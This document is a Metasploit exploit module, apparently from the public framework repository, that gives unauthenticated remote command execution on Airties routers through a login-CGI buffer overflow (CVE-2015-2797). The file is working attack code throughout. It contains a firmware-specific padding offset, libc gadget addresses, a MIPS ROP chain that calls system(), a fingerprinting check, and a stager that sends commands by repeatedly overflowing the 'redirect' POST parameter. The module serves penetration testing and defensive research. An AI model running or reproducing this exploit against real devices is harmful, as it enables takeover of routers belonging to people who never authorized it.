GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/http/airties_login_cgi_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Module metadata. 'Targets' holds a single firmware image; its 'Offset' and
  # the libc-relative gadget addresses are what prepare_shellcode packs into the
  # overflow, so the chain below is specific to that image and another firmware
  # build would need its own target entry.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Airties login-cgi Buffer Overflow',
        'Description' => %q{
This module exploits a remote buffer overflow vulnerability on several Airties routers.
The vulnerability exists in the handling of HTTP queries to the login cgi with long
redirect parameters. The vulnerability doesn't require authentication. This module has
been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.
Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,
Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
},
        'Author' => [
          'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['linux'],
        'Arch' => ARCH_MIPSBE,
        'References' => [
          ['CVE', '2015-2797'],
          ['EDB', '36577'],
          ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] # PoC
        ],
        'Targets' => [
          [
            'AirTies_Air5650v3TT_FW_1.0.2.0',
            {
              # Bytes of padding before the saved return address is overwritten.
              'Offset' => 359,
              # Every gadget below is added to this base (see prepare_shellcode).
              'LibcBase' => 0x2aad1000,
              'RestoreReg' => 0x0003FE20, # restore s-registers
              'System' => 0x0003edff, # address of system-1
              'CalcSystem' => 0x000111EC, # calculate the correct address of system
              'CallSystem' => 0x00041C10, # call our system
              'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call
            }
          ]
        ],
        'DisclosureDate' => '2015-03-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # The stager flavor is fixed to :echo in #exploit, so neither option is
    # meaningful to the user and both are hidden.
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  # Fingerprints the login CGI without sending the overflow: a GET to
  # /cgi-bin/login answered with 200/301/302 and a body mentioning
  # login.html?ErrorCode=2 is reported as Detected. This only shows the
  # endpoint behaves like the affected firmware; nothing here would
  # distinguish a fixed build that answers the same way, which is why the
  # result is Detected rather than Vulnerable.
  #
  # @return [Exploit::CheckCode] Detected on a matching response, Unknown
  #   on any other response or when the connection fails
  def check
    begin
      res = send_request_cgi({
        'uri' => '/cgi-bin/login',
        'method' => 'GET'
      })

      if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Unknown
  end

  # Aborts unless #check fingerprints the device, then runs the CmdStager with
  # the :echo flavor: the payload is delivered as a series of echo commands of
  # at most 100 bytes per line (:linemax), each of which the stager hands to
  # #execute_command and therefore each of which triggers the overflow once.
  def exploit
    print_status("Accessing the vulnerable URL...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
    end

    print_status("Exploiting...")
    execute_cmdstager(
      :flavor => :echo,
      :linemax => 100
    )
  end

  # Builds the oversized 'redirect' value: target['Offset'] bytes of random
  # uppercase padding up to the saved return address, then a big-endian
  # (pack 'N', MIPSBE) ROP chain of gadgets at target['LibcBase'] + offset,
  # followed by the command the chain passes to system(). The indented
  # listings are the original author's disassembly notes for each gadget; the
  # padding lengths between addresses are dictated by the stack frames those
  # gadgets pop, so the order and sizes below must not be changed in isolation.
  #
  # From a detection standpoint the artefact is a POST to /cgi-bin/login whose
  # redirect parameter is several hundred bytes of uppercase letters with
  # binary address bytes embedded and a shell command at the end.
  #
  # @param cmd [String] shell command line to run on the router
  # @return [String] padding + ROP chain + cmd
  def prepare_shellcode(cmd)
    shellcode = rand_text_alpha_upper(target['Offset']) # padding
    shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N") # restore registers with controlled values

    # 0003FE20 lw $ra, 0x48+var_4($sp)
    # 0003FE24 lw $s7, 0x48+var_8($sp)
    # 0003FE28 lw $s6, 0x48+var_C($sp)
    # 0003FE2C lw $s5, 0x48+var_10($sp)
    # 0003FE30 lw $s4, 0x48+var_14($sp)
    # 0003FE34 lw $s3, 0x48+var_18($sp)
    # 0003FE38 lw $s2, 0x48+var_1C($sp)
    # 0003FE3C lw $s1, 0x48+var_20($sp)
    # 0003FE40 lw $s0, 0x48+var_24($sp)
    # 0003FE44 jr $ra
    # 0003FE48 addiu $sp, 0x48

    shellcode << rand_text_alpha_upper(36) # padding
    shellcode << [target['LibcBase'] + target['System']].pack('N') # s0 - system address-1
    shellcode << rand_text_alpha_upper(16) # unused registers $s1 - $s4
    shellcode << [target['LibcBase'] + target['CallSystem']].pack('N') # $s5 - call system

    # 00041C10 move $t9, $s0
    # 00041C14 jalr $t9
    # 00041C18 nop

    shellcode << rand_text_alpha_upper(8) # unused registers $s6 - $s7
    shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parameter for call to system

    # 000215B8 addiu $a0, $sp, 0x20
    # 000215BC lw $ra, 0x1C($sp)
    # 000215C0 jr $ra
    # 000215C4 addiu $sp, 0x20

    shellcode << rand_text_alpha_upper(28) # padding
    shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N') # add 1 to s0 (calculate system address)

    # 000111EC move $t9, $s5
    # 000111F0 jalr $t9
    # 000111F4 addiu $s0, 1

    # The command itself sits at the end so the $a0 set up above points at it.
    shellcode << cmd
  end

  # CmdStager callback: delivers one staged command by triggering the overflow.
  # The chain goes out as the 'redirect' POST parameter with 'encode_params'
  # disabled so the packed address bytes reach the CGI unmodified; 'user' and
  # 'password' are random filler, since the bug needs no valid credentials.
  #
  # @param cmd [String] command line supplied by the stager
  # @param opts [Hash] stager options; unused here but required by the
  #   callback signature
  # @return [Object, nil] whatever send_request_cgi returns for the POST
  #   (the HTTP response, or nil if none was read)
  # @raise via fail_with(Failure::Unreachable) when the connection fails
  def execute_command(cmd, opts)
    shellcode = prepare_shellcode(cmd)
    begin
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => '/cgi-bin/login',
        'encode_params' => false,
        'vars_post' => {
          'redirect' => shellcode,
          'user' => rand_text_alpha(5),
          'password' => rand_text_alpha(8)
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end